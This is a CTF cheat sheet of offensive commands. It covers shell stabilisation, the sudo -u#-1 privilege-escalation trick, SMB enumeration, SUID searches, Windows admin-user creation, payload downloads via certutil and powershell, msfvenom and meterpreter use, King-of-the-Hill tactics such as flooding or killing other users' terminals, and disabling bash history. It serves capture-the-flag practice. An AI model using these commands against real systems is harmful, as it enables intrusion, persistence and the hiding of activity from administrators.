CTF-Writeups/Cheat Sheet.md
2020-10-31 11:04:52 -04:00

3.2 KiB

Linux

Stablilize Shell

  1. ctrl+z
  2. stty raw -echo
  3. fg (press enter x2)
  4. export TERM=xterm , for using clear command

Spawn bash

  • /usr/bin/script -qc /bin/bash 1&>/dev/null
  • python -c 'import pty;pty.spawn("/bin/bash")'
  • python3 -c 'import pty;pty.spawn("/bin/bash")'

Vulnerable sudo version

sudo -u#-1 whoami

Looking for smb shares

SmbClient

  • smbclient -L \\\\<ip\\ listing all shares
  • smbclient \\\\<ip>\\<share> accessing a share anonymously
  • smbclient \\\\10.10.209.122\\<share> -U <share> accessing a share with an authorized user

Smbmap

  • smbmap -u <username> -p <password> -H <ip>

Smbget

  • smbget -R smb://<ip>/<share>

Finding Binaries

  • find . - perm /4000 (user id uid)
  • find . -perm /2000 (group id guid)

Changing file attributes

chattr + i filename making file immutable
chattr -i filename making file mutable
lschattr filename Checking file attributes

Uploading Files

scp file/you/want user@ip:/path/to/store
python -m SimpleHTTPServer [port] By default will listen on 8000
python3 -m http.server [port] By default will listen on 8000

Downloading Files

wget http://:port/

Windows

Adding User

net user "USER_NAME" "PASS" /add

Changing User's password

net user "USER_NAME" "NEWPASS"

Adding User to Administrators

net localgroup administrators "USER_NAME" /add

Changing File Permissions

CACLS files /e /p {USERNAME}:{PERMISSION}
Permissions:
1.R Read
2.W Write
3.C Change
4.F Full Control

Set File bits

attrib +r filename add read only bit
attrib -r filename remove read only bit
attrib +h filename add hidden bit
attrib -h filename remove hidden bit

Show hidden file/folder

dir /a show all hidden files & folder
dir /a:d show only hidden folder
dir /a:h show only hidden files

Downloading Files

certutil.exe -urlcache -f http://<ip>:<port>/<file> ouput.exe
powershell -c "wget http://<ip>:<port>/<file>" -outfile output.exe

Msfvenom

List All Payloads

msfvenom -l payloads

List Payload Format

msfvenom --list formats

Meterpreter

Adding user for RDP

run getgui -u [USER_NAME] -p [PASS]

King Of The Hill (KoTH)

Monitoring and Closing Shell (Linux)

  • strace debugging / tamper with processes
  • gbd c/c++ debugger
  • script - records terminal activites
  • w /who check current pts ,terminal device
  • ps -t ps/pts-number process monitoring
  • script /dev/pts/pts-number montior terminal
  • cat /dev/urandom > /dev/pts/pts-number 2>/dev/null prints arbitary text on terminal
  • pkill -9 -t pts/pts-number

Run Bash script on king.txt

while [ 1 ]; do /root/chattr -i king.txt; done &

Send messages to logged in users

  • echo "msg" > /dev/pts/pts-number send message to specific user
  • wall msg boradcast message to everyone

Closing Session (Windows)

  • quser
  • logoff id|user_name

export HISTFILE=/dev/null found this it might help you out a little when doing KOTH it basically stops bash logging your commands in the ~/.bash_history file